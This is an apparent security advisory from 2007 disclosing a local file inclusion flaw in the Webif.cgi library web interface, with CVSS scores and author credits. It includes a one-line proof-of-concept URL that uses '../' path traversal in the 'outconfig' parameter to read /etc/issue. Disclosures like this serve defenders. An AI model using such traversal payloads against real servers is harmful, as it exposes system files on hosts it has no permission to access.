Webif.cgi local file inclusion

2007.06.22
Credit: maiosyet
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 9/10
Impact Subscore: 8.5/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Partial
Availability impact: Partial

.:: WEBIF.CGI LOCALE FILE INCLUSION ::. [#] AUTHOR: maiosyet [#] CONTACT: maiosyet (at) mawk (dot) org [email concealed] [#] SITE: http://www.mawk.org [#] ORIGINAL ADV: http://www.mawk.org/mods.php?mods=Core&page=view&id=102 [#] SOFTWARE: Webif.cgi http://www.ifnet.it/webif/ [#] DESCRIPTION: Webif is the natural solution for librarianships who want visibility across the web or would like to manage Intranet networks, the whole at a reasonable price. [#] BUG: Input passed to the "outconfig" parameter in webif.cgi is not properly verified. This can be exploited to include arbitrary files from local resources. [#] PoC: http://www.site.org/webif/webif.cgi?cmd=query&config=conf_2000/config.tx t&outconfig=../../../../etc/issue [#] Thanks: Einyx; Anathema, Hidden, XVII, Shatsar, Kaisentlaia and all the mawkers; black_dhalya :* Federico, Eveline (you know who you are).


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top